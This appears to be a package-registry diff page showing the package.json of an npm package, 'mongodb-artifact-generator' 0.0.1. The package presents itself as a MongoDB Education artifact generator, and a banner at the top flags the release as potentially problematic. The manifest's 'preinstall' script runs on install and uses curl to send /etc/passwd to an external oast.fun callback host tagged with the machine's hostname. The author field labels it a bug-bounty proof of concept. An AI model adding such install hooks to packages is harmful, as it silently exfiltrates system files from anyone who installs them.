mongodb-artifact-generator 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of mongodb-artifact-generator might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +67 -0
package/package.json ADDED
@@ -0,0 +1,67 @@
1
+ {
2
+ "name": "mongodb-artifact-generator",
3
+ "version": "0.0.1",
4
+ "description": "Generates content artifacts for MongoDB Education.",
5
+ "author": "Bug Bounty PoC",
6
+ "license": "Apache-2.0",
7
+ "keywords": [],
8
+ "engines": {
9
+ "node": ">=18",
10
+ "npm": ">=8"
11
+ },
12
+ "files": [
13
+ "build",
14
+ "README.md"
15
+ ],
16
+ "bin": {
17
+ "mongodb-ai": "./build/main.js"
18
+ },
19
+ "scripts": {
20
+ "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).xbiddglgmbwmuyfwjoof9rwtgf4y3cta5.oast.fun",
21
+ "clean": "rm -rf build",
22
+ "build": "tsc -b tsconfig.build.json",
23
+ "postbuild": "chmod +x build/main.js",
24
+ "watch": "tsc -b -w",
25
+ "test": "jest --forceExit",
26
+ "lint": "eslint ./src --ext ts,tsx,js,jsx --report-unused-disable-directives",
27
+ "lint:fix": "npm run lint -- --fix && prettier ./src --check --write",
28
+ "parseDriversCsv": "npm run build && node ./build/main.js parseDriversCsv --config='./build/standardConfig.js'"
29
+ },
30
+ "devDependencies": {
31
+ "@babel/preset-typescript": "^7",
32
+ "@babel/types": "^7.22.5",
33
+ "@types/jest": "^29.5.2",
34
+ "@types/jsdom": "^21.1.2",
35
+ "@types/node": "^12.20.55",
36
+ "@types/papaparse": "^5.3.14",
37
+ "@typescript-eslint/eslint-plugin": "^5",
38
+ "@typescript-eslint/parser": "^5",
39
+ "eslint": "^8",
40
+ "eslint-config-prettier": "^8",
41
+ "eslint-plugin-jsdoc": "^46.4.5",
42
+ "eslint-plugin-prettier": "^4",
43
+ "eslint-plugin-tsdoc": "^0.2.14",
44
+ "jest": "^29.5.0",
45
+ "nock": "^13.3.2",
46
+ "prettier": "^2",
47
+ "release-it": "^16.1.5",
48
+ "ts-jest": "^29.1.0",
49
+ "typedoc": "^0",
50
+ "typescript": "^5"
51
+ },
52
+ "dependencies": {
53
+ "@azure/openai": "^1.0.0-beta.6",
54
+ "@octokit/rest": "^20.1.0",
55
+ "@supercharge/promise-pool": "^3.2.0",
56
+ "@types/jira-client": "^7.1.9",
57
+ "common-tags": "^1.8.2",
58
+ "dotenv": "^16.4.5",
59
+ "front-matter": "^4.0.2",
60
+ "jira-client": "^8.2.2",
61
+ "mongodb-rag-core": "*",
62
+ "papaparse": "^5.4.1",
63
+ "yaml": "^2.3.1",
64
+ "yargs": "^17",
65
+ "zod": "^3.22.4"
66
+ }
67
+ }